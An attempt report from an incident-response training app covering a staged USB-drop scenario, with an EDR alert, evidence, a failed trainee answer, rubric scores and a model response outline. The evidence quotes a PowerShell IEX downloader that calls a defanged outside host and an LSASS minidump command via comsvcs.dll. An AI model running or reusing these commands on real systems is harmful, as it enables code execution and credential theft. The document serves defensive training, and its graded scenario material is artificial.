incident-response-trainer
Incident response training · Rule-based scoring
DemoCatalogDiagnosticHistoryDashboardCoach Notes
Attempt report

Receptionist plugged in USB labeled 'Q2 Bonus' — EDR flagged PowerShell launch

CybersecuritySuspicious USB DeviceDifficulty · Easy

Attempt 1 of 1 · cmqbuhsen00000j1h5n3d84ls

← All attempts↻ Retry this scenarioNew scenario
Progress vs previous attempt

This is your first attempt for this scenario. Retry the scenario to generate a side-by-side comparison against your previous response.

Progression · Keep practicing

Stay on Easy · Cybersecurity

4 signals are blocking advancement to Medium. Keep practicing at Easy until those areas stabilize. (Track: Cybersecurity)

Track · Cybersecurity
Easy
Sample · 5 recent attempts2 positive4 blocking

Signals helping

  • Dangerous action frequency. None in recent attempts
  • Recent retry improvement trend. Score is improving (+11 pts on later attempts)

Signals blocking advancement

  • Recent average score. 20 / 100 (need ≥ 75)
  • Recent pass rate. 0 of 5 passed (need ≥ 66%)
  • Rubric category coverage. 23% average (need ≥ 55%)
  • Consistently weak rubric areas. Investigation, Attack understanding, Containment
Submission · what was sent and how you responded
Suspicious USB DeviceDifficulty · easyMedium asset
[EDR] Suspicious LNK + powershell.exe -enc on RECEPT-WS-01
From
EDR Alerts <edr-alerts@acme-corp.local>
To
soc@acme-corp.com
Date
2026-04-19 16:08 UTC
Automated alert from EDR (rule USB-LNK-EXEC-02). Workstation RECEPT-WS-01 (reception desk, ground floor) executed a Windows shortcut (.lnk) from a removable USB drive at 16:03:17 UTC. The shortcut launched powershell.exe with an encoded command. Process tree: explorer.exe → powershell.exe -nop -w hidden -enc <base64> The reception staff member tells us she found a USB stick in the lobby labeled "Q2 Bonus — do not open" earlier today and plugged it in to "see who it belonged to." She has not used the workstation for any other task since. Please respond. — EDR / Endpoint Security
Evidence
EDR detection + USB enumeration (RECEPT-WS-01)
# Removable media event
Device:        USB Mass Storage  VID_0951&PID_1666 (Kingston)
Volume label:  Q2_BONUS
First seen:    2026-04-19 16:01:42 UTC on RECEPT-WS-01
Files:         Q2_Bonus_List.lnk, .hidden\stage1.ps1, README.txt

# LNK target (resolved)
target: %windir%\System32\WindowsPowerShell\v1.0\powershell.exe
args:   -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB...   (base64, decodes to IEX downloader)

# Decoded stage1 (preview)
$u = "https://cdn-doc-share[.]xyz/q2/s.ps1"
IEX (New-Object Net.WebClient).DownloadString($u)
# also attempts: rundll32 comsvcs.dll MiniDump <lsass pid> %TEMP%\l.dmp full

# Network activity from RECEPT-WS-01 (last 30 min)
16:03:18  TLS  RECEPT-WS-01 → cdn-doc-share[.]xyz:443
16:03:19  EDR blocked outbound to cdn-doc-share[.]xyz (low-rep, 8d-old domain)

# AV / VirusTotal lookup on stage1.ps1
SHA256 a14f..be07  →  41/72 (PowerShell.Downloader.*)
Affected asset
Name
RECEPT-WS-01
Type
Reception desk Windows workstation (shared, no privileged data stored locally)
Owner
Office Operations
Level
Medium
Your submitted response
96 words
Immediately isolate the affected host from the network to contain the threat while preserving volatile evidence. Capture memory and disk images, and collect relevant logs (auth, proxy, EDR) before any cleanup. Reset and rotate the compromised credentials, then review account and mailbox activity for signs of lateral movement or exfiltration. Notify the incident lead and prioritize the most business-critical assets first. After validating that the threat is removed, restore from a known-good backup, monitor for recurrence, and document a timeline for the post-incident review. Do not power off the machine before imaging, and avoid deleting logs.
Final score
28/ 100
96 words submitted
Verdict · Fail

The response is missing several critical incident response steps. Review the rubric and try again. Score: 28/100. Strongest area: Clarity & structure (68%). Weakest area: Attack understanding (0%) — expand this next time.

Category breakdown

Where points came from

coverage × weight = points
  • Attack understanding0/4 · 0.0 / 15
  • Asset impact2/3 · 6.7 / 10
  • Prioritization1/2 · 5.0 / 10
  • Containment1/5 · 4.0 / 20
  • Investigation1/5 · 3.0 / 15
  • Recovery0/3 · 0.0 / 10
  • Evidence preservation1/4 · 2.5 / 10
  • Clarity & structure1/2 · 6.8 / 10

Strengths

No category reached 70% coverage.

Missing / weak

  • Attack understanding
  • Containment
  • Investigation
  • Recovery
  • Evidence preservation

Dangerous actions detected

None detected in your response.

Learning · Coaching

Learn from this attempt

Post-submission coaching for this scenario. Score and verdict are unchanged — these notes are for your next attempt.

Why points were deducted

  • Attack understanding0% coverage

    Name the chain: lobby drop → .lnk-launched PowerShell -enc → IEX downloader → LSASS minidump attempt — not just `bad USB`.

  • Recovery0% coverage

    Reimage the host and rotate cached credentials; tighten removable-media policy at the org level so the next lobby drop fails closed.

  • Containment20% coverage

    Isolate the host, block cdn-doc-share[.]xyz at egress, kill the process chain, and physically secure the USB; partial containment leaves either domain or network exposure open.

Model answer outline

From: Incident Response Lead (SOC on-call)To: IT Leadership · Affected Asset Owner · On-call SOCSubject: [SEV-3][INC-CYB-EA84C] Receptionist plugged in USB labeled 'Q2 Bonus' — EDR flagged PowerShell launch — status update
Incident · INC-CYB-EA84C · SEV-3 / P3Status · Investigating — containment in progressCybersecurity · Suspicious USB Device · EasyRECEPT-WS-01 · Medium criticalityDetected ~ 2026-04-19 16:08 UTC
Situation & summary

An attacker dropped a USB labeled `Q2 Bonus — do not open` in the lobby; reception plugged it into RECEPT-WS-01 to find the owner. The .lnk launched `powershell.exe -nop -w hidden -enc` (decoded: `IEX (New-Object Net.WebClient).DownloadString` from cdn-doc-share[.]xyz, plus a `comsvcs.dll MiniDump` LSASS attempt). EDR blocked the outbound but the downloader stage executed locally — treat the host as compromised.

Severity & priority

Rated SEV-3 / P3. Treat as a P1 confirmed-execution incident (powershell.exe -enc actually ran), not a curiosity ticket.

Prioritization & impact
  • Treat as a P1 confirmed-execution incident (powershell.exe -enc actually ran), not a curiosity ticket.
  • Reception is a shared workstation in the public lobby — assume blast radius beyond the receptionist's own session.
  • Loop in EDR / Endpoint Security and the SOC lead before any user-facing cleanup begins.
Containment (actions taken / in progress)
  • Network-isolate RECEPT-WS-01 via EDR (or pull the cable) so any retried egress fails closed.
  • Block cdn-doc-share[.]xyz and the resolved IP at proxy / DNS / firewall before unisolating any other host.
  • Disable the local user account (cached creds may already be compromised), kill the powershell / rundll32 chain, and unplug + bag the USB.
Investigation (in progress)
  • Image the USB (Q2_BONUS volume) and decode all three files (.lnk, .hidden\stage1.ps1, README.txt) before anyone touches the drive again.
  • Pull EDR process tree, PowerShell Operational / 4104 / 4688 events, and the full base64 -enc payload for the SOC record.
  • Check whether the LSASS minidump (`comsvcs.dll MiniDump`) actually wrote `%TEMP%\l.dmp` — if so, treat domain-cached credentials as exposed.
  • Hunt across the fleet: the same USB VID/PID, the same SHA256, or any traffic to cdn-doc-share[.]xyz.
Recovery & next steps
  • Reimage RECEPT-WS-01 from a clean image — do not just `clean` the executed downloader.
  • Reset the receptionist's password and any cached domain account that was active on the host.
  • Tighten device-control policy (Intune / GPO) so removable storage is read-only or blocked at user-edge endpoints by default.
Evidence preservation
  • Bag-and-tag the USB stick (physical evidence, intact) and capture the full forensic image plus SHA256 of every artifact.
  • Snapshot RAM / volatile state on RECEPT-WS-01 before reimage; preserve EDR telemetry and PowerShell transcripts.
  • Record VirusTotal lookups (41/72 on stage1.ps1), and keep the original lobby USB photograph + label as part of the case file.
Stakeholder communication
  • Brief the receptionist factually and reassuringly — she did the right thing by reporting; the goal is not blame.
  • Notify Office Operations and the building security team (a physical adversary may have walked the lobby).
  • Send a short org-wide note re-iterating the `do not plug in unknown USB` policy without naming the user.
Do NOT
  • Do not plug the USB into another machine to `see what it does`.
  • Do not format / wipe the USB before imaging — you destroy evidence.
  • Do not delete the dropped binary or the .ps1 from the workstation before hashing and capturing it.
  • Do not just reimage and move on without checking whether the LSASS minidump succeeded.

Dangerous actions to avoid

  • Do not plug the USB into another machine to `see what it does`.
  • Do not format / wipe the USB before imaging — you destroy evidence.
  • Do not delete the dropped binary or the .ps1 from the workstation before hashing and capturing it.
  • Do not just reimage and move on without checking whether the LSASS minidump succeeded.

How to improve next time

  • EDR blocking the network call does not mean the host is clean — assume the local process executed and search for what it did before the block fired.
  • Always image the USB before plugging it in elsewhere; no `let me just try it on a sandbox laptop` shortcuts.
  • Decode the base64 -enc payload — never reason from `it was hidden so probably bad`; show the receiver the actual IEX downloader and the LSASS minidump call.
  • If the chain attempted LSASS dumping, treat any cached domain credentials on the host as exposed and rotate accordingly.
  • Tie the fix back to device-control policy: a single user-edge GPO / Intune change can convert this from a recurring lobby attack into a non-event.
AI · Supplemental review

Request an AI review of this attempt

This AI review is supplemental coaching. It does not change your official score or verdict. The review is only kept for this page session and is not saved permanently.

Review language
AI Tutor · Explains your result

AI Tutor

This tutor explains your result. It does not change your score. Pick a question to see how the deterministic grading reached your verdict and where to focus next.

Generated deterministically from your graded result — no AI model was called.

Why did I get this score?

Your verdict was Fail at 28/100. That total is the sum of deterministic rubric points across 8 categories — each scores how much of its expected, ordered steps your answer covered, not an opinion about your writing. Your strongest coverage was Clarity & structure (68%). Points were held back mostly in Attack understanding (0%), Recovery (0%), Containment (20%).

Rubric focusattackUnderstandingrecoverycontainment
Next study step

Re-read the attack understanding expectations for this scenario and list the concrete steps you missed.

This tutor explains your existing result. It does not change your score, verdict, or grade. Generated deterministically from your graded result — no AI model was called.

What should I improve first?

Focus on Attack understanding first — it is your weakest rubric area at 0% coverage and carries weight 15. For this scenario: Name the chain: lobby drop → .lnk-launched PowerShell -enc → IEX downloader → LSASS minidump attempt — not just `bad USB`.

Rubric focusattackUnderstanding
Next study step

Rewrite your attack understanding section as a short numbered checklist before your next attempt.

This tutor explains your existing result. It does not change your score, verdict, or grade. Generated deterministically from your graded result — no AI model was called.

How does my answer compare to the model answer outline?

Compared with the model answer outline, the most useful sections to study are the ones matching your weak areas. Re-read the outline's attack understanding, recovery, containment guidance and check which listed points you did not cover. The outline is a high-level checklist of expected points — use it to find gaps, not to copy a finished answer.

Rubric focusattackUnderstandingrecoverycontainment
Next study step

Pick one model-answer section you missed and add its key points to your next response in your own words.

This tutor explains your existing result. It does not change your score, verdict, or grade. Generated deterministically from your graded result — no AI model was called.

Which rubric area mattered most here?

Containment mattered most here: it carries the highest rubric weight (20), so coverage there moves your score the most. You covered 20% of it this time, worth 4 points.

Rubric focuscontainment
Next study step

Prioritise the highest-weight categories first; make sure containment is fully addressed before lower-weight ones.

This tutor explains your existing result. It does not change your score, verdict, or grade. Generated deterministically from your graded result — no AI model was called.

What should I study next?

Based on this attempt, study attack understanding, recovery, containment next. Coaching tip for this scenario: EDR blocking the network call does not mean the host is clean — assume the local process executed and search for what it did before the block fired.

Rubric focusattackUnderstandingrecoverycontainment
Next study step

EDR blocking the network call does not mean the host is clean — assume the local process executed and search for what it did before the block fired.

This tutor explains your existing result. It does not change your score, verdict, or grade. Generated deterministically from your graded result — no AI model was called.

Coach Notes

Open full notebook →

Save study notes for this attempt. They also collect in your mistake notebook.

Loading notes…